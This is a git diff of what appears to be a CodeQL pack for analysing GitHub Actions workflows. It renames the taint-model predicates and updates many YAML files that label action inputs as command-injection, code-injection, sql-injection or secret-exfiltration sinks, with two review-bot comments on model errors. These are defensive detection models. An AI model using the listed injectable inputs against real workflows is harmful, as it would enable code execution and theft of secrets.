.../reusable-workflows/werf_werf.model.yml | 2 +- .../widdix_aws-cf-templates.model.yml | 2 +- 
.../wildfly_wildfly.model.yml | 2 +- .../yt-dlp_yt-dlp.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 4 +- ql/lib/ext/getsentry_action-release.model.yml | 2 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- .../ext/go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../ext/gonuit_heroku-docker-deploy.model.yml | 2 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 2 +- .../ext/gradle_gradle-build-action.model.yml | 2 +- ql/lib/ext/haya14busa_action-cond.model.yml | 2 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/ilammy_setup-nasm.model.yml | 2 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 2 +- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 2 +- .../ext/jitterbit_get-changed-files.model.yml | 2 +- .../ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 2 +- .../ext/jurplel_install-qt-action.model.yml | 2 +- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 +- ...han_pull-request-comment-trigger.model.yml | 2 +- ...leci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 2 +- .../ext/leafo_gh-actions-luarocks.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 2 +- .../manusa_actions-setup-minikube.model.yml | 2 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 +- .../ext/meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 2 +- 
...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/msys2_setup-msys2.model.yml | 2 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 4 +- .../ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 2 +- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- ...-murray_issue-body-parser-action.model.yml | 2 +- .../ext/plasmicapp_plasmic-action.model.yml | 2 +- .../preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/py-actions_flake8.model.yml | 2 +- ...py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 2 +- ...vecircus_android-emulator-runner.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 2 +- .../ext/renovatebot_github-action.model.yml | 2 +- .../ext/roots_issue-closer-action.model.yml | 2 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 +- ...ction-detect-and-tag-new-version.model.yml | 4 +- ql/lib/ext/sergeysova_jq-action.model.yml | 2 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- .../ext/stackhawk_hawkscan-action.model.yml | 2 +- .../ext/step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 2 +- 
...ss_conventional-changelog-action.model.yml | 2 +- .../tryghost_action-deploy-theme.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 2 +- .../ext/wearerequired_lint-action.model.yml | 2 +- ql/lib/ext/webfactory_ssh-agent.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 2 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 2 +- ql/lib/ext/zaproxy_action-full-scan.model.yml | 2 +- ql/lib/qlpack.gbo | 13 --- ql/lib/qlpack.yml | 15 ++-- ql/lib/yaml.dbscheme | 80 ------------------- ql/lib/yaml.dbscheme.stats | 4 - ql/src/codeql-pack.lock.yml | 6 ++ ql/src/qlpack.yml | 7 +- ql/test/codeql-pack.lock.yml | 6 ++ ql/test/library-tests/test.ql | 4 +- ql/test/qlpack.yml | 6 +- 755 files changed, 819 insertions(+), 898 deletions(-) create mode 100644 .!79690!.DS_Store delete mode 100644 ql/lib/qlpack.gbo delete mode 100644 ql/lib/yaml.dbscheme delete mode 100644 ql/lib/yaml.dbscheme.stats diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 84a6ccba26d..c060ce97430 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 0.1.16 codeql/dataflow: - version: 0.1.8 + version: 0.2.7 + codeql/javascript-all: + version: 0.9.1 + codeql/mad: + version: 0.2.16 + codeql/regex: + version: 0.2.16 codeql/ssa: - version: 0.2.8 + version: 0.2.16 + codeql/tutorial: + version: 0.2.16 codeql/typetracking: - version: 0.2.8 + version: 0.2.16 codeql/util: - version: 0.2.8 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.1.5 + version: 0.2.16 compiled: false diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c46a3ee64a1..d0b84f918d5 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
+++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -55,8 +55,8 @@ predicate externallyTriggerableEventsDataModel(string event) { * - output arg: To node (prefixed with either `env.` or `output.`) * - provenance: verification of the model */ -predicate sourceModel(string action, string version, string output, string kind, string provenance) { - Extensions::sourceModel(action, version, output, kind, provenance) +predicate actionsSourceModel(string action, string version, string output, string kind, string provenance) { + Extensions::actionsSourceModel(action, version, output, kind, provenance) } /** @@ -69,10 +69,10 @@ predicate sourceModel(string action, string version, string output, string kind, * - kind: Either 'Taint' or 'Value' * - provenance: verification of the model */ -predicate summaryModel( +predicate actionsSummaryModel( string action, string version, string input, string output, string kind, string provenance ) { - Extensions::summaryModel(action, version, input, output, kind, provenance) + Extensions::actionsSummaryModel(action, version, input, output, kind, provenance) } /** @@ -84,13 +84,13 @@ predicate summaryModel( * - kind: sink kind * - provenance: verification of the model */ -predicate sinkModel(string action, string version, string input, string kind, string provenance) { - Extensions::sinkModel(action, version, input, kind, provenance) +predicate actionsSinkModel(string action, string version, string input, string kind, string provenance) { + Extensions::actionsSinkModel(action, version, input, kind, provenance) } predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { exists(Uses uses, string action, string version, string kind | - sourceModel(action, version, fieldName, kind, _) and + actionsSourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" 
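Review bot: The doc comment kept as context above `actionsSummaryModel` still says `kind: Either 'Taint' or 'Value'`, but the only consumer visible in this file, `externallyDefinedStoreStep` (hunk at -113,7), matches the literal lowercase `"taint"`. A model row written as `Taint` or `value`, as that comment suggests, would be dropped without any diagnostic, and the flow through the action would go unmodelled. Since the commit already touches this predicate, the comment should state what is actually accepted, for example `* - kind: "taint" (lowercase; the only kind consumed by externallyDefinedStoreStep)`. If `value` is consumed somewhere outside these hunks, the comment should name that place instead; the predicate bodies are only partly visible here.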
@@ -113,7 +113,7 @@ predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { exists(Uses uses, string action, string version, string input, string output | - summaryModel(action, version, input, output, "taint", _) and + actionsSummaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( @@ -135,7 +135,7 @@ predicate externallyDefinedStoreStep( predicate externallyDefinedSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | - sinkModel(action, version, input, kind, _) and + actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and ( if input.trim().matches("env.%") diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 6c64b72e6b4..05f71cfc0be 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,21 +5,21 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel( +extensible predicate actionsSourceModel( string action, string version, string output, string kind, string provenance ); /** * Holds if a summary model exists for the given parameters. */ -extensible predicate summaryModel( +extensible predicate actionsSummaryModel( string action, string version, string input, string output, string kind, string provenance ); /** * Holds if a sink model exists for the given parameters. */ -extensible predicate sinkModel( +extensible predicate actionsSinkModel( string action, string version, string input, string kind, string provenance ); 
diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index 67455900ec3..b897e8f2c5a 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml index 0220f0d54d8..3a5b34880b9 100644 --- a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml +++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 9b36680af8f..20abd532872 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index fe3c3e58b5f..dcc20433483 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 41b67c2a625..3afd9991e07 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 4d12a293696..3deae2a9f19 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index 7cb2e10e926..7dd0459ab7f 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 83f09bc6bde..721042aafaf 100644 --- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index bdd8a8f77c9..ee4dbaf2b55 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 7e5f5c9ee6a..76ae920d255 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] 
diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 8daa9a9c2b3..46f667d75a0 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 80502e487b8..4df6fe61a43 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index 2a26d31feac..aab329160ea 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index 82e81f55816..610d188f065 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index 58554eb3f61..b571bded8ca 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index ca99210b4c2..cd8f4f73e49 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 1563d95b0b1..6ebc3875e07 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml 
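Review bot: In the `aszc/change-string-case-action` summary rows, the second row maps `input.replace-with` to `output.uppercase`, while the row above it uses `input.string` as this action's input. `replace-with` is the input name used in the `frabert/replace-string-action` model later in this patch, so the row looks copied from there. If the action has no `replace-with` input, taint from `input.string` never reaches `output.uppercase`, and an injection through that output would not be reported. The row should probably read `- ["aszc/change-string-case-action", "*", "input.string", "output.uppercase", "taint", "manual"]`. The file may continue past this hunk, so check that every output of the action is covered from `input.string`.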
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index 2bb6000355d..2b2dbd014b7 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index b0c3419abe9..78b7eb1394c 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index cbe593690e4..0f146da2e0c 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index f29355d4882..483a3bf5172 100644 
--- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index 8463ed9577b..e06e75f7a3b 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index f20a877c3d2..d0a88ff3167 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index e0fe96ff915..a29f84a55b5 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml 
+++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index a7489b68688..0e11fe45b42 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index c0a18c36465..7e0970034a5 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"] - ["changesets/action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml index 79ed7a80437..2f62f211da9 100644 --- a/ql/lib/ext/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index 550b5b854ed..f94ad242321 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml index bbe88611259..5872399881c 100644 --- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index 83b3bc3520d..02c5dcd3cca 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 3b0642fece4..45bf0c57355 100644 
--- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml index db55d3c6f3a..4ac3492c41c 100644 --- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index a4539923b35..a48da0cedfc 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml index 46226863687..6ca7aa86c06 100644 --- a/ql/lib/ext/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"] 
